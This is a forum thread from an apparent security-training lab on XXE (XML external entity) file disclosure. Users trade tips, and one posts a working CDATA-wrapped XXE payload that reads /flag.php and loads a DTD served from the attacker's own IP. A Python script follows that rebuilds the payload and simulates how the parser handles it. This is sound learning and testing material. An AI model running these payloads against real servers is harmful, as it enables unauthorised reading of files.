Please could someone give me a tip to help complete the challenge at the end of the Advanced File Disclosure section?
I've tried both methods to try and find flag.php. When I use either method I can get the other PHP pages to show up fine, and I can view system files, but for some reason I can't find the flag. This makes me believe it might be contained in a subdirectory whose name I don't know. I've already tried fuzzing for different directories, but this still isn't helping.
Hi @Theonly_wilko,
I am not even able to view the system files in the response.
In my local DTD file, I kept it as echo '' > xxe.dtd
Also, in my request I append the piece of code given in the module, changing only the IP and port.
Can you tell me whether I should append anything in the local DTD file, as the hint says "Don't forget to point the 'file' to the flag in your local DTD file"?
So, for all struggling here, here is what you might want to do:
Basic
Make sure you include the entity reference inside the <email> * </email> tags. For instance: <email>&company;</email>
Don't forget the ; after the entity reference.
Advanced – CDATA
Set a payload on your machine:
echo '<!ENTITY joined "%begin;%file;%end;">' > xxe.dtd
python3 -m http.server 8000
Exploit: Add this at the top of the POST request in Burp Suite:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE email [
<!ENTITY % begin "<![CDATA[">
<!ENTITY % file SYSTEM "file:///flag.php">
<!ENTITY % end "]]>">
<!ENTITY % xxe SYSTEM "http://10.10.15.214:8000/xxe.dtd">
%xxe;
]>
...........
<email>&joined;</email>
...........
As you can tell, no secrets told. Everything is given in the module and is taken directly from it. Though, the error-based XXE doesn't seem to work for me at all.
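To see why the CDATA wrapper in the post above is needed, here is an added example (not from the post or the module) that rebuilds the DOCTYPE and xxe.dtd from an IP, port and target path, and then simulates what the target's XML parser ends up with after resolving &joined;. Python's stdlib expat parser does not fetch external entities, so the entity expansion is reproduced by hand in simulate_expansion(); the IP, port, file contents and flag value are all constructed for illustration.

```python
"""Simulate the CDATA-wrapped XXE file disclosure from the thread above.

Constructed example: the target's XML parser is modelled with Python's
stdlib xml.etree (expat), which does not resolve external entities, so
the resolution of &joined; / %file; is reproduced by plain string
substitution.  IP, port, paths and file contents are made up.
"""
import xml.etree.ElementTree as ET

# Constructed stand-ins for files on the target.
FLAG_PHP = '<?php\n$flag = "FLAG{constructed_example}";\n?>\n'
CONFIG_TXT = "threshold < 10 && debug=1\n"


def build_dtd() -> str:
    """Contents of xxe.dtd served from the attacker box (as in the post).
    %file; may only be referenced inside an entity value in the EXTERNAL
    subset, which is why this line cannot live in the DOCTYPE itself."""
    return '<!ENTITY joined "%begin;%file;%end;">\n'


def build_doctype(attacker_ip: str, attacker_port: int, target_path: str) -> str:
    """DOCTYPE prepended to the POST body; only IP, port and path change."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        "<!DOCTYPE email [\n"
        '<!ENTITY % begin "<![CDATA[">\n'
        f'<!ENTITY % file SYSTEM "file://{target_path}">\n'
        '<!ENTITY % end "]]>">\n'
        f'<!ENTITY % xxe SYSTEM "http://{attacker_ip}:{attacker_port}/xxe.dtd">\n'
        "%xxe;\n"
        "]>\n"
    )


def simulate_expansion(file_content: str, wrap_in_cdata: bool) -> str:
    """Return the <email> element as the parser sees it once the entity
    has been replaced: %begin;%file;%end; (CDATA) or just the raw file."""
    if wrap_in_cdata:
        replacement = "<![CDATA[" + file_content + "]]>"
    else:
        replacement = file_content
    return "<email>" + replacement + "</email>"


def disclose(file_content: str, wrap_in_cdata: bool):
    """Parse the expanded document the way the server would.
    Returns ("ok", text_inside_email) or ("parse_error", message)."""
    doc = simulate_expansion(file_content, wrap_in_cdata)
    try:
        root = ET.fromstring(doc)
    except ET.ParseError as exc:
        return ("parse_error", str(exc))
    # expat hands CDATA back as character data; a bare <?php ... ?> is
    # consumed as a processing instruction and never reaches .text.
    return ("ok", root.text or "")


if __name__ == "__main__":
    print(build_doctype("10.10.15.214", 8000, "/flag.php"))
    print("xxe.dtd:", build_dtd())
    for name, content in (("flag.php", FLAG_PHP), ("config.txt", CONFIG_TXT)):
        for wrap in (False, True):
            print(name, "CDATA" if wrap else "raw ", "->", disclose(content, wrap))
```

Running it shows the two failure modes the CDATA trick avoids: the PHP file is swallowed as a processing instruction (the request succeeds but <email> is empty), and a file containing a bare < or & makes the whole document ill-formed. Wrapped in CDATA, both come back verbatim. A file that itself contains ]]> would still terminate the CDATA section early; the module's payload does not handle that case and neither does this one.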